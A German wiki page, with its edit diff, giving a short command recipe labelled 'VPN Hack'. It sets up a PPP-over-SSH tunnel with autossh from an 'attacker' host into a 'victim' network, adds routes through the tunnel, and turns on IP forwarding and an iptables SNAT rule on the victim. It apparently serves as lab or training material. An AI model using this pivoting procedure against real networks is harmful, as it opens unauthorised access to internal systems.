VPN Hack: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=VPN einrichten um Zugriff zum Netz zu erlangen= *apt-get install ppp =Angreifer= ==Vpn-Hack== *pppd updetach noauth passive pty "autossh -D 19999 -P 10.0..104…“)
 
 
(3 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
 
=VPN einrichten um Zugriff zum Netz zu erlangen=
 
=VPN einrichten um Zugriff zum Netz zu erlangen=
*apt-get install ppp
+
*apt install ppp autossh
 +
 
 
=Angreifer=
 
=Angreifer=
 
==Vpn-Hack==
 
==Vpn-Hack==
*pppd updetach noauth passive pty "autossh -D 19999 -P 10.0..104 -p 22 -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1
+
*pppd updetach noauth passive pty "autossh -D 19999 -P 10.0.5.104 -p 22 -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1
  
*ip route add 10.80.100.101/32 via 172.29.29.1
+
*ip route add 10.0.5.0/24 via 172.29.29.1
*ip route add 10.80.100.102/32 via 172.29.29.1
 
*ip route add 10.80.100.103/32 via 172.29.29.1
 
*ip route add 10.80.100.104/32 via 172.29.29.1
 
*ip route add 10.80.100.106/32 via 172.29.29.1
 
*ip route add 10.80.100.107/32 via 172.29.29.1
 
*ip route add 10.80.100.108/32 via 172.29.29.1
 
  
 
=Opfer=
 
=Opfer=
 
==VPN Forward und Nat==
 
==VPN Forward und Nat==
 
*echo 1 >  /proc/sys/net/ipv4/ip_forward
 
*echo 1 >  /proc/sys/net/ipv4/ip_forward
*iptables -t nat -I POSTROUTING -j SNAT -s 172.29.29.2 --to 10.80.100.105
+
*iptables -t nat -I POSTROUTING -j SNAT -s 172.29.29.2 --to 10.0.5.104

Aktuelle Version vom 29. September 2022, 08:03 Uhr

VPN einrichten um Zugriff zum Netz zu erlangen

  • apt install ppp autossh

Angreifer

Vpn-Hack

  • pppd updetach noauth passive pty "autossh -D 19999 -P 10.0.5.104 -p 22 -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1
  • ip route add 10.0.5.0/24 via 172.29.29.1

Opfer

VPN Forward und Nat

  • echo 1 > /proc/sys/net/ipv4/ip_forward
  • iptables -t nat -I POSTROUTING -j SNAT -s 172.29.29.2 --to 10.0.5.104